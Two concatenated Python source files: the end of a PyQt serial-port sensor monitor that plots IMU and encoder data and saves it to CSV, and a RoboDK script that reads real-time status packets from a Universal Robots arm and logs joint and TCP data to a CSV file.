def combo_stopbits_change(self):
self.stop_bits = self.comboBoxStopBits.currentText()
def combo_sensor_change(self):
self.sensor = self.comboBoxSensor.currentText()
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
def set_cursor(self):
self.cursor.movePosition(QtGui.QTextCursor.End)
self.textbox.setTextCursor(self.cursor)
def start_reading(self):
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
if self._reading_thread is None:
self._stop_flag = False
self.read_port()
else:
self.textbox.append(f"Port already opened.\r")
self.set_cursor()
def stop_reading(self):
if self._reading_thread is not None:
self._stop_flag = True
self._reading_thread.join()
self._reading_thread = None
self.textbox.append(f"Port {self.com_port} closed.\n")
self.set_cursor()
def clear_window(self):
self.textbox.setText("")
self._plot_refs = [None, None, None]
self.main_plot.axes.cla()
self.main_plot.draw()
self.main_plot.axes.set_ylim(self.plot_yrange[self.sensor.lower()[:3]])
def save_data(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
file_name, _ = QFileDialog.getSaveFileName(self, "Save file", "c:\\", "CSV Files (*.csv)", options=options)
if file_name:
df = pd.DataFrame({"time": self.x_data,
"accelX": self.y_data[0][0],
"accelY": self.y_data[0][1],
"accelZ": self.y_data[0][2],
"gyroX": self.y_data[1][0],
"gyroY": self.y_data[1][1],
"gyroZ": self.y_data[1][2],
"enc1": self.y_data[2][0],
"enc2": self.y_data[2][1],
"enc3": self.y_data[2][2]})
df.to_csv(Path(file_name), index=False)
def plot_data(self):
y_data = {"ACCELEROMETER": self.y_data[0], "GYROSCOPE": self.y_data[1], "ENCODERS": self.y_data[2]}
if y_data[self.sensor][0].size >= self.n_data:
y_data_plot = [data[-self.n_data:] for data in y_data[self.sensor]]
for i, colour in enumerate(self.plot_colours):
if self._plot_refs[i] is None:
self._plot_refs[i] = self.main_plot.axes.plot(self.x_data_plot, y_data_plot[i], colour)[0]
else:
self._plot_refs[i].set_ydata(y_data_plot[i])
self.main_plot.draw()
def reading_loop(self, serial):
while not self._stop_flag:
data = serial.readline()
data = str(data.decode('utf-8'))
self.textbox.append(data)
self.cursor.movePosition(QtGui.QTextCursor.End)
self.textbox.setTextCursor(self.cursor)
data_list = data.split("; ")
for sens, sensor_data in enumerate(data_list):
span = re.search(r'\[[^\]]*\]', sensor_data).span()
data_axes = sensor_data[span[0] + 1:span[1] - 1].split(",")
for ax in range(len(data_axes)):
self.y_data[sens][ax] = np.append(self.y_data[sens][ax], int(data_axes[ax]))
self.x_data = np.append(self.x_data, (len(self.x_data) * self.timebase) + self.timebase)
if self.x_data.size > 0:
self.plot_data()
def read_port(self):
try:
ser = serial.Serial(port=self.com_port,
baudrate=int(self.baud_rate),
bytesize=int(self.data_bits),
parity=self.parity[0],
stopbits=int(self.stop_bits))
self.textbox.append(f"Port {self.com_port} opened.\r")
self.set_cursor()
self._reading_thread = Thread(target=self.reading_loop, args=(ser,), daemon=True)
self._reading_thread.start()
except serial.serialutil.SerialException:
self.textbox.append(f"No device found on {self.com_port}.\n")
self.set_cursor()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Window()
app.exec_()
|
UR_Monitoring_CSV.py
|
# This script creates a thread to monitor the position and other variables from a real UR robot and stores the data to a CSV file
# With this script running, RoboDK will save a CSV file of the robot status
#
# Press F5 to run the script
# Or visit: http://www.robodk.com/doc/en/PythonAPI/
from robolink import * # API to communicate with RoboDK
from robodk import * # basic matrix operations
import threading
import socket
import struct
import os
import time
TOLERANCE_JOINTS_REFRESH = 1e9 # Refresh the screen every time the robot position changes by this much (in deg)
RETRIEVE_JOINTS_ONCE = False # If True, the current robot position will be retrieved once only
SAVE_CSV_FILE = True # If True, the position and speed of the TCP will be recorded with a time stamp
# Create targets given a tolerance in degrees
CREATE_TARGETS = False
TOLERANCE_JOINTS_NEWTARGET = 1e9 # tolerance in degrees
REFRESH_RATE = 0.01 # Display rate in RoboDK
# Make current robot joints accessible in case we run it on a separate thread
global ROBOT_JOINTS
# Procedure to check if robot joint positions are different according to a certain tolerance
def Robot_Joints_Check(jA,jB, tolerance_deg=1):
if jA is None:
return True
for i in range(6):
if abs(jA[i]-jB[i]) > tolerance_deg*pi/180:
return True
return False
#########################################################################
# Byte shifts to point to the right byte data inside a packet
UR_GET_TIME = 1
UR_GET_JOINT_POSITIONS = 252 # Real Joint Position
UR_GET_JOINT_SPEEDS = 300 # Real Joint Speeds
UR_GET_JOINT_CURRENTS = 348
UR_GET_TCP_POSITION = 444 # Real TCP position
UR_GET_TCP_SPEED = 492 # Real TCP speed
UR_GET_TCP_FORCES = 540
UR_GET_INPUTS = (86-32)*8 + 252
UR_GET_OUTPUTS = (131-32)*8 + 252
# Get packet size according to the byte array
def packet_size(buf):
if len(buf) < 4:
return 0
return struct.unpack_from("!i", buf, 0)[0]
# Check if a packet is complete
def packet_check(buf):
msg_sz = packet_size(buf)
if len(buf) < msg_sz:
print("Incorrect packet size %i vs %i" % (msg_sz, len(buf)))
return False
return True
# Get specific information from a packet
def packet_value(buf, offset, nval=6):
if len(buf) < offset+nval:
print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
return None
fmt = '!'
for i in range(nval):
fmt+='d'
return list(struct.unpack_from(fmt, buf, offset)) #return list(struct.unpack_from("!dddddd", buf, offset))
# Get packet bits
def packet_value_bin(buf, offset, nval=8):
if len(buf) < offset+nval:
print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
return None
hex_list = ''
return ''.join(format(x, '02x') for x in buf[offset:(offset+nval)])
#########################################################################
# Enter RoboDK IP and Port
ROBOT_IP = None #'192.168.2.31'
ROBOT_PORT = 30003
# Start RoboDK API
RDK = Robolink()
# Retrieve a robot
robot = RDK.ItemUserPick('Select a UR robot to monitor', ITEM_TYPE_ROBOT)
if not robot.Valid():
quit()
robotname = robot.Name()
print("Using robot %s" % robotname)
# Retrieve Robot's IP:
if ROBOT_IP is None:
ip,port,path,ftpuser,ftppass = robot.ConnectionParams()
ROBOT_IP = ip
if SAVE_CSV_FILE:
# Save monitoring to file:
file_path = RDK.getParam('FILE_OPENSTATION')[:-4] + '_Monitoring_%s_%s.csv' % (robotname, time.strftime("%Y-%m-%d-%Hh%Mm%Ss", time.gmtime()))
print("Monitoring robot %s to %s" % (robotname, file_path))
fid = open(file_path,'w')
fid.write('time (s), Speed (m/s), Speed (rad/s), J1 (deg), J2 (deg), J3 (deg), J4 (deg), J5 (deg), J6 (deg), TCP X (m), TCP Y (m), TCP Z (m), TCP u (rad), TCP v (rad), TCP w (rad), Speed X (m/s), Speed Y (m/s), Speed Z (m/s), Speed u (rad/s), Speed v (rad/s), Speed w (rad/s), Inputs, Outputs\n')
tic()
# Action to take when a new packet arrives
def on_packet(packet, packet_id):
global ROBOT_JOINTS
# Retrieve desired information from a packet
rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS)
ROBOT_JOINTS = [ji * 180.0/pi for ji in rob_joints_RAD]
ROBOT_TCP_XYZUVW = packet_value(packet, UR_GET_TCP_POSITION)
ROBOT_TCP_SPEED = packet_value(packet, UR_GET_TCP_SPEED)
ROBOT_INPUTS = packet_value_bin(packet, UR_GET_INPUTS)
ROBOT_OUTPUTS = packet_value_bin(packet, UR_GET_OUTPUTS)
#print("Output:")
#print(ROBOT_OUTPUTS)
#ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS)
#ROBOT_CURRENT = packet_value(packet, UR_GET_JOINT_CURRENTS)
#print(ROBOT_JOINTS)
# Record once every 5 packets (125/5=25 Hz)
if SAVE_CSV_FILE:
if packet_id % 5 == 0:
fid.write(str(toc())) # Write time stamp in seconds
fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[0:3])) # Position speed
fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[3:6])) # Orientation speed
for value in ROBOT_JOINTS:
fid.write(',%.6f' % value)
for value in ROBOT_TCP_XYZUVW:
fid.write(',%.6f' % value)
for value in ROBOT_TCP_SPEED:
fid.write(',%.6f' % value)
fid.write(',' + ROBOT_INPUTS)
fid.write(',' + ROBOT_OUTPUTS)
fid.write('\n')
# Monitor thread to retrieve information from the robot
def UR_Monitor():
while True:
print("Connecting to robot %s -> %s:%i" % (robotname, ROBOT_IP, ROBOT_PORT))
rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT))
print("Connected")
buf = b''
packet_count = 0
packet_time_last = time.time()
while True:
more = rt_socket.recv(4096)
if more:
buf = buf + more
if packet_check(buf):
packet_len = packet_size(buf)
packet, buf = buf[:packet_len], buf[packet_len:]
on_packet(packet, packet_count)
packet_count += 1
if packet_count % 250 == 0:
t_now = time.time()
msg = "Monitoring %s at %.1f packets per second" % (robotname, packet_count/(t_now-packet_time_last))
print(msg)
RDK.ShowMessage(msg, False)
packet_count = 0
packet_time_last = t_now
rt_socket.close()
ROBOT_JOINTS = None
last_joints_target = None
last_joints_refresh = None
# Start the Robot Monitor thread
#q = queue.Queue()
t = threading.Thread(target=UR_Monitor)
t.daemon = True
t.start()
#UR_Monitor()
# Start the main loop to refresh RoboDK and create targets/programs automatically
target_count = 0
while True:
# Wait for a valid robot joints reading
if ROBOT_JOINTS is None:
continue
# Set the robot to that position
if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH):
last_joints_refresh = ROBOT_JOINTS
robot.setJoints(ROBOT_JOINTS)
# Stop here if we need only the current position
if RETRIEVE_JOINTS_ONCE:
quit(0)
# Check if the robot has moved enough to create a new target
if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET):
last_joints_target = ROBOT_JOINTS
target_count = target_count + 1
newtarget = RDK.AddTarget('T %i' % target_count, 0, robot)
# Take a short break
pause(REFRESH_RATE)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.